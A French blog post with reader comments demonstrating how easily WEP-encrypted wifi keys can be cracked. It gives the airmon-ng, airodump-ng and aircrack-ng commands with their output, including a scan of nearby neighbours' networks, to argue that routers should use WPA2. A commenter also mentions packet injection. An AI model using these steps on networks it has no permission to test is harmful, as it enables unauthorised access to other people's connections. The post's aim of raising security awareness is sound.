Peut-on pirater votre connexion wifi ? Qu’est-ce qui empêche les personne de se connecter sur votre routeur (box internet) ?
Pour pouvoir se connecter sur votre connexion, les personnes ont besoin d’un mot de passe qui est bien souvent à rallonge (exemple : A2AB653B9E0DEC79497E147CE6). Mais est-ce suffisant ?
Premièrement il faut savoir que ces clé sont crypté. Il y a d’ailleurs plusieurs sorte de cryptage.
- WEP
- WPA
- WPA2
Ce qu’il faut savoir ce que le WEP n’est pas sécurisé et que le WPA l’est de moins en moins. Donc vérifiez bien que votre routeur est en WPA2.
Lorsque je dit que le réseau en WEP n’est pas sécurisé, j’ai souvent des remarques du genre « Le code est super long avec plein de lettre et chiffre mélangé, c’est introuvable ! »
Je vais vous montrer la simplicité de trouver la clé lorsqu’elle est en WEP. Pour ce faire je me mettrai sous Linux et j’utiliserais un outil (aircrack).
Premièrement il faut que l’interface wifi soit en mode monitoring, elle analyse les données qui circulent.
sudo airmon-ng start « l'interface wifi »
(pour moi sudo airmon-ng start wlan0)
Pour voir les interfaces que vous avez, faites « ifconfig »
$ sudo airmon-ng start wlan0
Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 836 avahi-daemon 837 avahi-daemon 842 NetworkManager 989 wpa_supplicant 2094 dhclient Process with PID 2094 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0)
Au début vous avez une liste de processus qui utilise la carte réseau. Le mieux c’est de les fermer. Cependant vous allez perdre votre connexion internet.
Sinon ce qui est intéressant c’est « mon0« , voila l’interface que j’utiliserais pour mes prochaine commande.
Ensuite vous faite un scann des réseau WEP environnant.
$ sudo airodump-ng --write out.data --encrypt wep mon0
CH 6 ][ BAT: 47 mins ][ Elapsed: 56 s ][ 2011-07-24 11:30 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:**:60:**:39:** -53 119 0 0 6 54e WEP WEP NUMERICABLE-**** **:24:**:04:**:BF -73 514 478 0 6 54e WEP WEP DartyBox_****_WEP 00:**:2B:**:38:** -77 58 4 0 6 54e WEP WEP NUMERICABLE-**** **:17:**:9D:**:8E -86 99 0 0 6 54e WEP WEP NUMERICABLE-**** 00:**:F2:**:51:** -86 49 0 0 6 54e WEP WEP NUMERICABLE-****
Vous aurez certainement une autre partie en dessous qui sont les ordinateurs détectés, comme je compte faire très simple, je ne vais pas utiliser l’autre partie.
Vous voyez la colonne data avec des chiffre qui monte ? Super, c’est ce qu’il faut. Ceci veut dire qu’il y a du trafic sur le réseau. Vous pouvez alors lancer aircrack sur le réseau où les data augmentent. Attention il faut laisser airodump ouvert, vous ouvrez donc un second terminal.
Vous lancer aircrack pour craquer le réseau :
$ sudo aircrack-ng -x *.cap *.ivs
Ceci vous demandera le réseau que vous souhaitez craquer, choisissez le bon dans la liste.
Voici ce que ça va donner :
Aircrack-ng 1.1 [00:00:01] Tested 110081 keys (got 478 IVs) KB depth byte(vote) 0 255/256 CF( 256) AB( 768) AC( 768) AD( 768) 00( 512) 01( 512) 15( 512) 1C( 512) 1D( 512) 1E( 512) 1F( 512) 20( 512) 21( 512) 22( 512) 23( 512) 24( 512) 25( 512) 26( 512) 1 4/ 1 AA( 768) 12( 512) 19( 512) 1A( 512) 1B( 512) 1C( 512) 1D( 512) 1E( 512) 1F( 512) 20( 512) 21( 512) 22( 512) 23( 512) 24( 512) 25( 512) 26( 512) 27( 512) 28( 512) 2 1/ 2 8E(1280) A4( 768) A5( 768) A6( 768) 0E( 512) 15( 512) 16( 512) 17( 512) 18( 512) 19( 512) 1A( 512) 1B( 512) 1C( 512) 1D( 512) 1E( 512) 1F( 512) 20( 512) 21( 512) 3 0/ 20 F2(2048) 89(1280) 9F( 768) A0( 768) A1( 768) 09( 512) 10( 512) 11( 512) 12( 512) 13( 512) 14( 512) 15( 512) 16( 512) 17( 512) 18( 512) 19( 512) 1A( 512) 1B( 512) 4 0/ 2 EC(2560) 83(1280) 99( 768) 9A( 768) 9B( 768) 03( 512) 0A( 512) 0B( 512) 0C( 512) 0D( 512) 0E( 512) 0F( 512) 10( 512) 11( 512) 12( 512) 13( 512) 14( 512) 15( 512) Failed. Next try with 5000 IVs.
La prochaine tentative sera automatique lorsque « data » sera à 5000. Vous laissez donc les deux terminaux ouvert et la clé sera trouvé toute seule. Ne soyez pas étonné s’il faut parfois 1.000.000 data pour certain réseau voir plus.
Plus vous aurez de data, plus vous aurez de chance de craquer la clé WEP. Les datas augmentes lorsqu’il y a quelqu’un qui utilise la connexion. Il y a des méthodes qui permettent de stimuler la connexion afin d’avoir beaucoup de data très rapidement. Mais là je vous montre juste la méthode très simple. 3 ligne de commande. La personne patiente et c’est trouvé.
^_^ Allez Scorfly !! Tu commence a toucher aux vrais outils, Bienvenue dans le moule !!
Il y a aussi les injections de paquets au cas où le réseau à déchiffrer n’a pas beaucoup de trafic.
C’est ce que je dit à la fin :
« Il y a des méthodes qui permettent de stimuler la connexion afin d’avoir beaucoup de data très rapidement. »
Mais mon but c’est pas de faire un tuto « devenir un pirate pour les nuls » mais de montrer qu’un réseau se craque très simplement sans avoir à passer beaucoup de temps devant le PC.
Après il y a des lois tel qu’HADOPI qui deviennent tellement ridicule quand on voit la simplicité pour rentrer dans le réseau.